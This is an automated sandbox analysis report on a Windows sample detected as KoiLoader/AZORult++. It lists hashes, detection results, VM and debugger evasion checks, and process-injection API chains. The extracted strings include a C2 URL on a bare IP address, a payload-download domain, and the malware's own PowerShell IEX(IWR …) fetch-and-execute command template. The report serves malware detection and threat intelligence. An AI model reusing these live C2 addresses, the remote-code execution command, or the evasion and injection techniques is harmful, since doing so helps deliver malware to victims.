Windows Analysis Report
DWbCUTdGhV.exe

Overview

General Information

Sample name: DWbCUTdGhV.exe
renamed because original name is a hash value
Original sample name: 13b4c5dff00cf1ea8a635743903e387f.exe
Analysis ID: 1528826
MD5: 13b4c5dff00cf1ea8a635743903e387f
SHA1: de5d0e9a174171257a9539117d82659bbad98139
SHA256: af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
Tags: exe, KoiLoader, user-abuse_ch

Detection

AZORult++, KoiLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected KoiLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: DWbCUTdGhV.exe Avira: detected
Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp Malware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}
Source: DWbCUTdGhV.exe ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe Virustotal: Detection: 76%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: DWbCUTdGhV.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8316 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW, 0_2_011F8316
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8340 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_011F8340
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8F40 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_011F8F40
Source: DWbCUTdGhV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DWbCUTdGhV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00798ACD FindFirstFileExW, 0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620

Networking

Source: Malware configuration extractor URLs: http://121.127.33.20/fermentum.php
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F62B0 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree, 0_2_011F62B0
Source: DWbCUTdGhV.exe String found in binary or memory: http://121.127.33.20/fermentum.php
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://121.127.33.20/fermentum.php%temp%
Source: DWbCUTdGhV.exe String found in binary or memory: https://kionaonline.com/modules/bonslick
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kionaonline.com/modules/bonslick/c

E-Banking Fraud

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8DD0 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_011F8DD0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5E70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_011F5E70
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_011F5AF0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079E87D 0_2_0079E87D
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7440 0_2_011F7440
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7860 0_2_011F7860
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F24A0 0_2_011F24A0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F4260 0_2_011F4260
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F4660 0_2_011F4660
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: String function: 00793040 appears 46 times
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: String function: 00794480 appears 33 times
Source: DWbCUTdGhV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F6210 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_011F6210
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F6BC0 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear, 0_2_011F6BC0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Command line argument: jhl46745fghb 0_2_00792F40
Source: DWbCUTdGhV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DWbCUTdGhV.exe ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe Virustotal: Detection: 76%
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Section loaded: sspicli.dll
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DWbCUTdGhV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DWbCUTdGhV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DWbCUTdGhV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: Yara match File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DWbCUTdGhV.exe.11f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DWbCUTdGhV.exe PID: 2132, type: MEMORYSTR
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00791300

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_011F8620
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe File opened / queried: C:\Windows\System32\VBoxService.exe
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe API coverage: 9.8 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00798ACD FindFirstFileExW, 0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
Source: DWbCUTdGhV.exe Binary or memory string: Hyper-V
Source: DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: DWbCUTdGhV.exe Binary or memory string: VMWare
Source: DWbCUTdGhV.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: DWbCUTdGhV.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0079695B
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00791300
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00791710 mov ecx, dword ptr fs:[00000030h] 0_2_00791710
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007975A2 mov eax, dword ptr fs:[00000030h] 0_2_007975A2
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00799763 mov eax, dword ptr fs:[00000030h] 0_2_00799763
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F7650 mov eax, dword ptr fs:[00000030h] 0_2_011F7650
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5E70 mov eax, dword ptr fs:[00000030h] 0_2_011F5E70
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079A845 GetProcessHeap, 0_2_0079A845
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00793D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00793D4E
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_0079421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0079421C
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007943AF SetUnhandledExceptionFilter, 0_2_007943AF

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_011F5AF0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_007944C5 cpuid 0_2_007944C5
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_00794103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00794103
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_011F8620
No contacted IP infos